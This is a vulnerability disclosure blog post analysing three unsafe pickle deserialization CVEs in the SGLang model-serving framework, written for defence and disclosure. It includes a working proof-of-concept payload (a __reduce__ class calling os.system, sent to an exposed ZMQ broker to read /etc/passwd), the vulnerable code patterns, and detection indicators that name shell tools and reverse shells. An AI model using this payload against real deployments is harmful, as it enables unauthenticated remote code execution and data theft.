
Key Takeaways
-
SGLang, an open-source AI/ML framework, has been found to contain multiple unsafe deserialization vulnerabilities (CVE-2026-3059, CVE-2026-3060, and CVE-2026-3989), which allow for unauthenticated remote code execution, posing a significant risk to users and developers of AI applications.
-
These vulnerabilities are critical because they enable attackers to execute arbitrary code without authentication, potentially leading to the exposure of sensitive data and compromise of entire environments. With the increasing reliance on AI and machine learning, the implications for security and data integrity are substantial.
-
The impacted parties include organizations utilizing SGLang for deploying AI applications, as well as the larger community of developers and researchers in AI/ML, who may face increased risks due to the widespread use of unsafe Python serialization methods like pickle.
Orca Security identified multiple unsafe deserialization vulnerabilities in SGLang, a widely used AI/ML framework, leading to three critical CVEs that allow unauthenticated remote code execution and insecure deserialization, with no response from maintainers or available patches.
The Orca Security Research Pod continuously investigates the security posture of widely adopted AI/ML infrastructure. During a focused audit of LLM serving frameworks, I discovered multiple unsafe deserialization vulnerabilities in SGLang, a popular open-source framework for serving large language models and multimodal AI models. These findings were coordinated through CERT/CC (case VU#665416), with additional analysis contributed by CERT/CC vulnerability researcher Christopher Cullen.
Three CVEs have been assigned: CVE-2026-3059, CVE-2026-3060, and CVE-2026-3989. The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network. The third involves insecure deserialization in a crash dump replay utility. At the time of publication, the SGLang maintainers have not responded to coordinated disclosure efforts, and no official patch is available.
Quick Overview
| Attribute | CVE-2026-3059 | CVE-2026-3060 | CVE-2026-3989 |
|---|---|---|---|
| Component | Multimodal generation ZMQ broker (scheduler_client.py) |
Disaggregation encoder receiver (encode_receiver.py) |
Crash dump replay script (replay_request_dump.py) |
| CWE | CWE-502 (Deserialization of Untrusted Data) | CWE-502 (Deserialization of Untrusted Data) | CWE-502 (Deserialization of Untrusted Data) |
| CVSS 3.1 | 9.8 Critical | 9.8 Critical | 7.8 High |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Attack Vector | Network | Network | Local |
| Authentication | None | None | None |
| User Interaction | None | None | Required |
| Affected Versions | ≥ 0.5.5 through latest (0.5.9 at time of publication) | All versions with disaggregation module | All versions containing replay_request_dump.py |
| Fix Available | No | No | No |
CVSS Rationale
CVE-2026-3059 and CVE-2026-3060 score 9.8 because the ZMQ broker binds to all available network interfaces (tcp://*) by default with zero authentication, and the pickle.loads() call executes immediately on any received payload. An attacker with network access to the exposed port needs nothing else – no credentials, no user interaction, no complex race conditions. The result is full code execution in the context of the SGLang process. This is a textbook unauthenticated network RCE.
Explore related questions
Note: The 9.8 base score reflects severity when the affected feature is active. The multimodal generation and disaggregation modules must be explicitly enabled; default text-only SGLang deployments do not expose the vulnerable broker.
CVE-2026-3989 scores 7.8 High (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). While the impact upon execution is the same as the network RCEs – full arbitrary code execution – the attack prerequisites are meaningfully different. This is a debugging utility in a scripts/playground/ directory; exploitation requires an attacker to plant a malicious .pkl file where an operator will manually load it, via write access to a crash dump directory or social engineering. It underscores the systemic nature of unsafe pickle usage throughout the SGLang codebase.
What Is SGLang?
SGLang is an open-source serving framework developed by LMSYS for running large language models and multimodal AI models in production. It supports a wide range of popular models – including Qwen, DeepSeek, Mistral, and Skywork – and provides OpenAI-compatible API endpoints. SGLang is designed for high-throughput, low-latency inference and is used across research labs and production deployments. In most production environments, SGLang runs inside containerized GPU inference infrastructure – Kubernetes pods, Docker containers, or dedicated GPU nodes. Compromising an SGLang instance could expose model weights, inference data, API credentials, GPU workloads, and potentially provide a pivot point into the surrounding cluster environment.
Technical Analysis
Root Cause: Python’s pickle on Untrusted Network Data
All three vulnerabilities share a single root cause: the use of Python’s pickle module to deserialize data from untrusted sources.
Python’s own documentation explicitly warns that the pickle module is not secure and should never be used to deserialize untrusted data. The reason is fundamental to how pickle works – a pickle stream doesn’t just encode data, it encodes instructions for reconstructing Python objects. An attacker can craft a pickle payload whose reconstruction instructions include arbitrary function calls, achieving full code execution the moment pickle.loads() runs.
This is not a novel class of vulnerability. The same pattern has led to RCE in other ML serving frameworks, notably CVE-2024-9053 in vLLM and CVE-2025-10164 in a previous SGLang component. The persistence of pickle-based deserialization in ML tooling is a systemic problem, and SGLang’s codebase contains over 20 instances of pickle.loads() across different modules.
How Pickle Deserialization Becomes Code Execution
For readers less familiar with Python internals, it’s worth understanding why pickle.loads() on untrusted data is equivalent to eval().
When Python pickles an object, it stores instructions for how to rebuild that object later. These instructions include which callable to invoke and what arguments to pass. The __reduce__ method on a Python class controls this process – it tells pickle how to “reduce” an object to a reconstructable form. Critically, the callable specified in __reduce__ is not restricted to constructors. It can be any callable, including os.system, subprocess.Popen, or eval.
Here is the core of our proof-of-concept payload:
class RCEPayload:
def __init__(self, cmd):
self.cmd = cmd
def __reduce__(self):
return (os.system, (self.cmd,))
When pickle.loads() processes a serialized RCEPayload, it doesn’t reconstruct an RCEPayload instance. Instead, it calls os.system(cmd) executing an arbitrary shell command. The pickle protocol faithfully follows the stored instructions with no sandboxing, no allowlisting, and no type checking.
The serialized payload is just bytes on the wire. There’s nothing in the pickle bytestream that distinguishes “safe data” from “malicious instruction.” From the ZMQ broker’s perspective, it receives bytes, calls pickle.loads(), and execution happens before any application-level validation could occur.
CVE-2026-3059: Multimodal Generation Broker – Full Code Flow
To understand the attack surface, we need to trace the complete path from server startup to deserialization.
Step 1: Server Launch
When an operator starts SGLang’s diffusion server:
python -m sglang.multimodal_gen.runtime.launch_server \
--model-path stabilityai/stable-diffusion-3-medium \
--port 8000
The FastAPI application lifecycle hook automatically starts the ZMQ broker as a background task:
@asynccontextmanager
async def lifespan(app: FastAPI):
# ...
broker_task = asyncio.create_task(run_zeromq_broker(server_args))
yield
broker_task.cancel()
The broker starts automatically as part of the application lifecycle when the multimodal server is running.
Step 2: Broker Binds to All Interfaces
The broker opens a ZeroMQ REP socket and binds to tcp://*:{broker_port}:
async def run_zeromq_broker(server_args: ServerArgs):
ctx = zmq.asyncio.Context()
socket = ctx.socket(zmq.REP)
broker_endpoint = f"tcp://*:{server_args.broker_port}" # ALL interfaces
socket.bind(broker_endpoint)
The tcp://* binding means the broker listens on all available network interfaces – 127.0.0.1, the machine’s LAN IP, any public IP, and any container/pod network interface. The broker port defaults to http_port + 1. In the launch example above (--port 8000), the broker listens on port 8001. With SGLang’s default HTTP port of 30000, the broker would be on port 30001.
Although broker_host exists as a field in ServerArgs, the original code ignores it and hardcodes the binding to *.
Step 3: Direct Deserialization of Network Data
The broker’s main loop receives raw bytes and passes them directly to pickle.loads():
while True:
try:
payload = await socket.recv()
request_batch = pickle.loads(payload) # <-- RCE here
logger.info("Broker received an offline job from a client.")
response_batch = await async_scheduler_client.forward(request_batch)
await socket.send(pickle.dumps(response_batch))
except Exception as e:
logger.error(f"Error in ZMQ Broker: {e}", exc_info=True)
try:
await socket.send(pickle.dumps({"status": "error", "message": str(e)}))
except Exception:
pass
There are zero security boundaries between socket.recv() and pickle.loads(). No authentication check. No message format validation. No source IP filtering. No TLS. The ZMQ REP socket accepts connections from any source, and the first thing the code does with the received bytes is deserialize them with pickle.
Note also that the exception handler catches the error after the payload has already been deserialized and executed – the except block cannot prevent the RCE, it only handles downstream errors.
Step 4: Exploitation
From the attacker’s side, the exploit is minimal – a standard ZMQ REQ socket and a pickle payload:
ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect(f"tcp://{target}:{port}")
payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))
sock.send(payload)
This is a single-message exploit. The attacker connects, sends one ZMQ message, and the command executes. The ZMQ REP/REQ pattern even sends a response back, confirming that the broker processed the message.
CVE-2026-3060: Disaggregation Encoder Receiver
The same pickle deserialization pattern exists in a completely separate component – SGLang’s encoder parallel disaggregation system in encode_receiver.py (lines 202 and 643).
This module is activated when a user passes the --encoder-transfer-backend zmq_to_scheduler flag, enabling ZMQ-based transfer between encoder and scheduler components. Like the multimodal broker, it binds a ZMQ socket to tcp://* and calls pickle.loads() on incoming payloads without authentication.
The attack mechanics are identical to CVE-2026-3059, but the code is maintained by a different team within the SGLang project (@ByronHsu, @hnyls2002, @ShangmingCai). This is worth noting because it means patches – if they ever arrive – may land on different timelines for the two components.
CVE-2026-3989: Crash Dump Replay Script
The replay_request_dump.py utility in scripts/playground/ loads .pkl files with pickle.load() and no validation:
def read_records(files):
records = []
for f in files:
tmp = pickle.load(open(f, "rb"))
if isinstance(tmp, dict) and "requests" in tmp:
records.extend(tmp["requests"])
else:
records.extend(tmp)
return records
The script is designed to replay crash dumps generated by SGLang when --crash-dump-folder is configured. Here’s the attack scenario in concrete terms:
- SGLang writes crash dump
.pklfiles to a configured directory (e.g.,/data/sglang_crash_dump/). - An attacker with write access to that directory – or who can supply a file via social engineering (“can you replay this crash dump for me?”) – drops a malicious
.pklfile. - The operator runs:
python3 replay_request_dump.py --input-file /data/sglang_crash_dump/malicious.pkl pickle.load()executes the attacker’s payload.
The PoC for this CVE (developed by CERT/CC) uses a payload that returns a valid {'requests': []} structure after executing its code, so the script continues running normally – the operator may not even notice the execution:
class POC:
def __reduce__(self):
payload = (
"(__import__('pathlib').Path('poc_marker.txt').write_text("
"'pickle payload executed\\n', encoding='utf-8'), {'requests': []})[1]"
)
return (eval, (payload,))
Proposed Patch Analysis
As part of the coordinated disclosure, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch with two changes:
Change 1: Localhost binding (effective)
# Original: binds to all interfaces
broker_endpoint = f"tcp://*:{server_args.broker_port}"
# Patched: binds to localhost by default
host = server_args.broker_host or "127.0.0.1"
broker_endpoint = f"tcp://{host}:{server_args.broker_port}"
This eliminates remote exploitation entirely. Even if pickle deserialization remains, an attacker would need local access to the machine.
Change 2: msgpack serialization with pickle fallback (partial)
The patch introduces _pack() / _unpack() functions that prefer msgpack but fall back to pickle:
def _unpack(b: bytes) -> Any:
try:
return _from_basic(msgpack.unpackb(b, raw=False))
except Exception:
return pickle.loads(b) # Fallback still vulnerable
This is a pragmatic transition mechanism – it allows existing pickle-speaking components to continue working while new messages use msgpack. However, the fallback means that an attacker who crafts a payload that deliberately fails msgpack parsing (which any valid pickle stream will) still reaches pickle.loads().
With the localhost binding in place, this is a local-only risk and acceptable for a transitional fix. Without the localhost binding, the msgpack wrapper alone would not prevent remote exploitation.
The synchronous SchedulerClient class also still uses send_pyobj() / recv_pyobj() (ZMQ’s built-in pickle-based methods), but these connect to internal scheduler endpoints rather than the exposed broker, making them lower priority.
The real fix: Both changes together are effective as an immediate mitigation. The long-term fix requires replacing all 20+ pickle.loads() instances throughout the codebase with safe serialization – a significant engineering effort that the vendor would need to own.
Attack Flow (CVE-2026-3059 / CVE-2026-3060)
- The target runs SGLang with multimodal generation or disaggregation features enabled.
- The ZMQ broker binds to
tcp://*:{port}, accessible from the network. - The attacker connects to the exposed port and sends a pickle payload containing a malicious
__reduce__method. - SGLang calls
pickle.loads()on the payload, triggering arbitrary code execution. - The attacker has code execution with the full privileges of the SGLang process.
No authentication. No headers. No API keys. Just a raw TCP connection and a pickle bytestream.
Affected Versions
| Component | Introduced | Affected Range | Fixed Version |
|---|---|---|---|
multimodal_gen (CVE-2026-3059) |
Commit 7bc1dae09 (2025-11-05) |
≥ 0.5.5 through latest (0.5.9+) | None |
| Disaggregation module (CVE-2026-3060) | Present in all versions with ZMQ disaggregation | All versions with feature | None |
replay_request_dump.py (CVE-2026-3989) |
Present since script creation | All versions | None |
Disclosure Timeline
| Date | Event |
|---|---|
| 2026-02-04 | Vulnerability discovered by Igor Stepansky (Orca Security) |
| 2026-02-04 | GitHub Security Advisory (GHSA-3cp7-c6q2-94xr) submitted to SGLang |
| 2026-02-04 | Report submitted to CERT/CC |
| 2026-02-09 | CERT/CC creates case VU#665416; vendor invited |
| 2026-02-09 | PoC files uploaded and validated |
| 2026-02-10 | CERT/CC confirms disclosure date of March 26, 2026 |
| 2026-02-17 | CERT/CC reaches out directly to SGLang maintainers; no response |
| 2026-02-23 | CVE-2026-3059 and CVE-2026-3060 assigned; CERT/CC indicates plans to contact CISA for additional assistance |
| 2026-03-02 | CERT/CC develops proposed patch (msgpack + localhost binding) |
| 2026-03-03 | GHSA-wxjp-55q2-vg27 opened with patch proposal |
| 2026-03-11 | CVE-2026-3989 identified by CERT/CC (Christopher Cullen); CVE assigned |
Despite multiple contact attempts through GitHub Security Advisories and direct email by CERT/CC – including outreach to CISA for assistance – the SGLang maintainers did not respond at any point during the coordination process. No vendor statement was obtained, and no official patch has been released.
Threat Status
Active Exploitation: No exploitation of these specific vulnerabilities has been observed in the wild at the time of publication.
PoC Availability: Functional proof-of-concept code for CVE-2026-3059 and CVE-2026-3060 exists and was shared with CERT/CC during coordination. A PoC for CVE-2026-3989 was developed by CERT/CC. Given the trivial nature of pickle deserialization exploits, weaponization requires minimal effort.
Important context: The multimodal generation and disaggregation features must be explicitly enabled for CVE-2026-3059 and CVE-2026-3060 to be exploitable. Default SGLang text-only inference deployments are not affected by these two CVEs. However, any deployment running multimodal_gen or disaggregation with ZMQ transport is immediately vulnerable if the broker port is network-reachable.
Detection Guidance
Network-level indicators for CVE-2026-3059 / CVE-2026-3060:
- Monitor for unexpected inbound TCP connections to the ZMQ broker port (default:
http_port + 1). ZMQ traffic on this port from external or untrusted source IPs is anomalous. - ZMQ uses a specific wire protocol – a ZMTP handshake followed by message frames. Network IDS signatures for ZMTP on unexpected ports can flag exposure.
Host-level indicators:
- Unexpected child processes spawned by the SGLang Python process (e.g.,
/bin/sh,curl,wget,nc). - File creation in unusual locations by the SGLang process (e.g.,
/tmp/pwned, reverse shell scripts). - Outbound connections from the SGLang process to unexpected destinations.
Remediation
Immediate actions:
- Network segmentation. Ensure ZMQ broker ports (default:
http_port + 1) are not exposed to untrusted networks. Use firewall rules to restrict access to localhost or known internal clients only. - Review deployment flags. If you are not using multimodal generation or disaggregation features, ensure they are not enabled.
- Audit crash dump handling. Do not run
replay_request_dump.pyon.pklfiles from untrusted sources or shared directories with weak permissions.
Proposed Patch (Unmerged)
As detailed in the Patch Analysis section above, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch that binds the ZMQ broker to localhost by default and replaces pickle with msgpack serialization (with a transitional pickle fallback). This patch has been submitted to the SGLang maintainers via GitHub Security Advisory GHSA-wxjp-55q2-vg27 but has not been merged. Users may apply similar mitigations manually.
Long-Term Recommendation
SGLang’s codebase contains more than 20 instances of pickle.loads() and related unsafe deserialization calls. A comprehensive audit and migration to safe serialization formats (msgpack, JSON, or Protocol Buffers) is necessary to address the systemic risk.
The Bigger Picture: Pickle in AI/ML Infrastructure
This is not an isolated finding. Unsafe pickle deserialization is arguably the most prevalent vulnerability class in the Python AI/ML ecosystem. The pattern repeats across model serving frameworks, training pipelines, model registries, and utility scripts.
The reason is understandable: pickle is convenient. It serializes arbitrary Python objects with zero schema definition. For fast-moving ML projects focused on model performance rather than security hardening, pickle is the path of least resistance. But that convenience comes at a cost – every pickle.loads() call on untrusted input is an implicit eval().
Organizations deploying open-source LLM serving infrastructure should audit their dependencies for pickle usage, restrict network access to internal communication endpoints, and treat any pickle deserialization of external data as a critical security boundary.
How Can Orca Help?
The Orca Platform secures AI as an evolution of its core capabilities identifying, prioritizing, and remediating risk across cloud environments. With Orca, customers can:
- inventory of AI models, cloud-managed AI services, unmanaged apps and other self-hosted AI frameworks
- pinpoint where AI models and tools are running
- detect sensitive data on the assets running AI projects, including training or fine-tuning datasets, as well as AI files
- prioritize and remediate AI vulnerabilities and risks to AI workloads
To learn more or see the Orca Platform in action, schedule a personalized 1:1 demo.